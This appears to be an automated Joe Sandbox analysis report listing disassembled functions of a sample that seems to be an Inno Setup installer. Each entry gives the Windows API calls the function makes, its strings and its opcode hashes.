                                                                            • Opcode ID: 5f673916f2f1a7bd541b0d62232f8ae55c9ae3956016ff461948b8aacee5762a
                                                                            • Instruction ID: 7372c421533d8f65bf23ff6fb62ce760878112a7f7dadb819c72ada28c104ff7
                                                                            • Opcode Fuzzy Hash: 5f673916f2f1a7bd541b0d62232f8ae55c9ae3956016ff461948b8aacee5762a
                                                                            • Instruction Fuzzy Hash: 4C1133716002049BDB10EE59C8C2B5B7794EF8475AF05446AFD589B2C7DB38E809CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 25b8e2896a406469b6f6139b27e4eef2d48fc4beb07379a7f64976553b5074da
                                                                            • Instruction ID: e05957f4d255e36abe150b4c83bb7920b28d063535c27f5b5ffcdbb78f87973e
                                                                            • Opcode Fuzzy Hash: 25b8e2896a406469b6f6139b27e4eef2d48fc4beb07379a7f64976553b5074da
                                                                            • Instruction Fuzzy Hash: 13114C742407059BC710DF59D880B86FBE5EB99350B10C53BE9688B385D378E946CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,004519B1), ref: 00451993
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1452528299-0
                                                                            • Opcode ID: b822ffd6bab2ceeebd4ee60c556d267bab9060fc5fbf9a5dc2e8634a343b25ff
                                                                            • Instruction ID: 105945ddca3cabd7714cdb0ae074d91085a40d6b67da20b4593713f233405893
                                                                            • Opcode Fuzzy Hash: b822ffd6bab2ceeebd4ee60c556d267bab9060fc5fbf9a5dc2e8634a343b25ff
                                                                            • Instruction Fuzzy Hash: 740170756082486F8B00DF699C509EEFBE8EB4D72071083B7FC54D3791D6344D05D668
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,0045C016), ref: 0045BF4F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: c4ef4bc2e753c798f4f219e8f4b24b78eea389d3c77b177ec4b9d52599943b5a
                                                                            • Instruction ID: 2913e94657538f1a306bb7ed27eed344dd43a6c30afdb59308231f58c8b71720
                                                                            • Opcode Fuzzy Hash: c4ef4bc2e753c798f4f219e8f4b24b78eea389d3c77b177ec4b9d52599943b5a
                                                                            • Instruction Fuzzy Hash: FCD0E9B17557045BDF90EE794C81B0237D8BB48701F5084666908DB286E774E8048E58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                            • Opcode Fuzzy Hash: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0044AE98: GetVersionExA.KERNEL32(00000094), ref: 0044AEB5
                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F009,00492971), ref: 0044AF13
                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AF2B
                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AF3D
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF4F
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF61
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF73
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF85
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF97
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AFA9
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AFBB
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AFCD
                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AFDF
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFF1
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B003
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B015
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B027
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B039
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B04B
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B05D
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B06F
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B081
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B093
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B0A5
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B0B7
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B0C9
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B0DB
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0ED
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0FF
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B111
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B123
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B135
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B147
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B159
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B16B
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B17D
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B18F
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B1A1
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B1B3
                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B1C5
                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B1D7
                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1E9
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1FB
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B20D
                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B21F
                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B231
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B243
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B255
                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B267
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                            • API String ID: 1968650500-2910565190
                                                                            • Opcode ID: 5a45ccbf4a1a9fffc540ac45431ca0f32488a1cb66156aa5fb789ea7b16ff6be
                                                                            • Instruction ID: 3769fa21ef169b5859ff7299002385904a822408566faed309fb3dc54f14a28c
                                                                            • Opcode Fuzzy Hash: 5a45ccbf4a1a9fffc540ac45431ca0f32488a1cb66156aa5fb789ea7b16ff6be
                                                                            • Instruction Fuzzy Hash: 3891C2F0A40B50EBEF00EBF5D886E2A32A8EA56B1471445BBB444EF295D77CC8058F5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00456A3B
                                                                            • QueryPerformanceCounter.KERNEL32(021E3858,00000000,00456CCE,?,?,021E3858,00000000,?,004573CA,?,021E3858,00000000), ref: 00456A44
                                                                            • GetSystemTimeAsFileTime.KERNEL32(021E3858,021E3858), ref: 00456A4E
                                                                            • GetCurrentProcessId.KERNEL32(?,021E3858,00000000,00456CCE,?,?,021E3858,00000000,?,004573CA,?,021E3858,00000000), ref: 00456A57
                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00456ACD
                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021E3858,021E3858), ref: 00456ADB
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00493A80,00000003,00000000,00000000,00000000,00456C8A), ref: 00456B23
                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00456C79,?,00000000,C0000000,00000000,00493A80,00000003,00000000,00000000,00000000,00456C8A), ref: 00456B5C
                                                                              • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456C05
                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00456C3B
                                                                            • CloseHandle.KERNEL32(000000FF,00456C80,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456C73
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                            • API String ID: 770386003-3271284199
                                                                            • Opcode ID: 5006241aebc6898b4b8c5a0b3d2f1eafd7ba10c83dc686a4641eb2167e0a9961
                                                                            • Instruction ID: 1494ba0c9f092ba5553c36d9802a3eccbba6a72ce31e74165ab773d774e4cee1
                                                                            • Opcode Fuzzy Hash: 5006241aebc6898b4b8c5a0b3d2f1eafd7ba10c83dc686a4641eb2167e0a9961
                                                                            • Instruction Fuzzy Hash: 90714570A003449FDB11DB69CC41B9EBBF8EB09305F5185BAF908FB282D77859488F69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetVersion.KERNEL32 ref: 0045AEFE
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045AF1E
                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045AF2B
                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045AF38
                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045AF46
                                                                              • Part of subcall function 0045ADEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045AE8B,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045AE65
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B139,?,?,00000000), ref: 0045AFFF
                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B139,?,?,00000000), ref: 0045B008
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                            • API String ID: 59345061-4263478283
                                                                            • Opcode ID: 2e1c75f00da70986db0bef7873a233c0400535374564b15abc59da2f2a3f743b
                                                                            • Instruction ID: e1143608cea91b2c9fc6243bba76dd5dc8e0698664409433b5fa99cab1fe32bf
                                                                            • Opcode Fuzzy Hash: 2e1c75f00da70986db0bef7873a233c0400535374564b15abc59da2f2a3f743b
                                                                            • Instruction Fuzzy Hash: 275191B1900608EFDB10DF99C851BAFB7B8EB09751F14806AF915B7381C3389948CFA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 004734FF
• GetLastError.KERNEL32(?,?), ref: 00473508
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00473555
• GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00473579
• CloseHandle.KERNEL32(00000000,004735AA,00000000,00000000,000000FF,000000FF,00000000,004735A3,?,?,?), ref: 0047359D
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CloseCodeErrorExecuteExitHandleLastMultipleObjectsProcessShellWait
• String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
• API String ID: 171997614-221126205
• Opcode ID: 468cd06050aeac50d7fc6c39a96f1f48007959102f91cd93909f9b3bed5077f9
• Instruction ID: 9270c58e3c51a63ec14468394db3a8dd1a523cee094c78596453f11dd74f1eb5
• Opcode Fuzzy Hash: 468cd06050aeac50d7fc6c39a96f1f48007959102f91cd93909f9b3bed5077f9
• Instruction Fuzzy Hash: F72177B0A00114BEDB11EFA99842BDE76E8EB04309F50847BF508E7382DB7C8B059B5D
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422964
• ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422B2E), ref: 00422974
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: MessageSendShowWindow
• String ID:
• API String ID: 1631623395-0
• Opcode ID: 922aa224a59eb388fd409ef1a4572993a041e07f03dc34a9f221e61418859b32
• Instruction ID: 2ef64a615a047e5f68810d1bba8f9c023c2191b8b92af7ee41424443907fb462
• Opcode Fuzzy Hash: 922aa224a59eb388fd409ef1a4572993a041e07f03dc34a9f221e61418859b32
• Instruction Fuzzy Hash: F0919271B04214FFD710EBA9DA86F9D77F4AB09304F5100B6F504AB3A2C778AE419B58
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00418303
• GetWindowPlacement.USER32(?,0000002C), ref: 00418320
• GetWindowRect.USER32(?), ref: 0041833C
• GetWindowLongA.USER32(?,000000F0), ref: 0041834A
• GetWindowLongA.USER32(?,000000F8), ref: 0041835F
• ScreenToClient.USER32(00000000), ref: 00418368
• ScreenToClient.USER32(00000000,?), ref: 00418373
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: Window$ClientLongScreen$IconicPlacementRect
• String ID: ,
• API String ID: 2266315723-3772416878
• Opcode ID: e2831b492a02c7fbc1c424da0d3d82ddc563106dbc431b226c0011ccd89e5e33
• Instruction ID: 9cf88c6662a8b54f2d940af1896da5675c8924d24fa9a5d7825e36bf04e718ba
• Opcode Fuzzy Hash: e2831b492a02c7fbc1c424da0d3d82ddc563106dbc431b226c0011ccd89e5e33
• Instruction Fuzzy Hash: 40112B71505201AFDB00DF69C885F9B77E8AF49314F18067EBD58DB286C739D900CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000,?,0047873E,00000000,00000000), ref: 00478395
• FindNextFileA.KERNEL32(000000FF,?,00000000,004784A5,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000), ref: 00478481
• FindClose.KERNEL32(000000FF,004784AC,004784A5,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000), ref: 0047849F
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000,?,0047873E,00000000), ref: 004784F8
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: Find$File$First$CloseNext
• String ID: dF
• API String ID: 2001080981-2048908954
• Opcode ID: e3d3b5ea0d471a75f1e892318c37568382ec9ab9af60859860025bbf46b96970
• Instruction ID: 1e7589c0754ebee773f1854eaa6e10daa326bf9e4fcfb169a8671094cc7bf5de
• Opcode Fuzzy Hash: e3d3b5ea0d471a75f1e892318c37568382ec9ab9af60859860025bbf46b96970
• Instruction Fuzzy Hash: 55713F7090020DAFCF11EFA5CC45ADFBBB9EB49304F5084AAE408A7291DB799B45CF59
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00453D5B
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D61
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00453D7A
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DA1
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DA6
• ExitWindowsEx.USER32(00000002,00000000), ref: 00453DB7
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
• Opcode ID: 97208243a47202ed253c42c48129ddaf64d2c6fbfffe2a3ff53d5c10fd5cf2c8
• Instruction ID: d8781a87663673bff4f7e6514a95c709f3d412548914224523031170f5c416b5
• Opcode Fuzzy Hash: 97208243a47202ed253c42c48129ddaf64d2c6fbfffe2a3ff53d5c10fd5cf2c8
• Instruction Fuzzy Hash: 4EF0687039470675E610AE71CD07F6B21F89B40B8BF50482ABD45EA1C3D6BCD60C4A6E
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045B4B5
• GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045B4C5
• GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045B4D5
• ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047A0C3,00000000,0047A0EC), ref: 0045B4FA
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: AddressProc$CryptVersion
• String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
• API String ID: 1951258720-508647305
• Opcode ID: 066b20a5c1c1bbf827e7ba668025f4c9a0b11cdabd4051e249f6bd47f2c53a5d
• Instruction ID: 5c97a33bf6e4b00775a7c8e6a9d5d7120da5cee44da396d260546e37c2af37dc
• Opcode Fuzzy Hash: 066b20a5c1c1bbf827e7ba668025f4c9a0b11cdabd4051e249f6bd47f2c53a5d
• Instruction Fuzzy Hash: E5F012B150170DEEE758DF76EC85A263695E7EC31EF14803B6405551BEE778044ACA1C
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000,004921D8,?,?,00000000,00494628), ref: 00491F13
• SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00491F96
• FindNextFileA.KERNEL32(000000FF,?,00000000,00491FD2,?,00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000), ref: 00491FAE
• FindClose.KERNEL32(000000FF,00491FD9,00491FD2,?,00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000,004921D8), ref: 00491FCC
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstNext
• String ID: isRS-$isRS-???.tmp
• API String ID: 134685335-3422211394
• Opcode ID: 5f65020aef3fb45fb11887bb1f6e63c6b85ff76842c9e0dedd88080743c31966
• Instruction ID: 691f2d73da31f32e7dea4a5c2fc00664967572ef0d2ca01005a435b1a41f50a9
• Opcode Fuzzy Hash: 5f65020aef3fb45fb11887bb1f6e63c6b85ff76842c9e0dedd88080743c31966
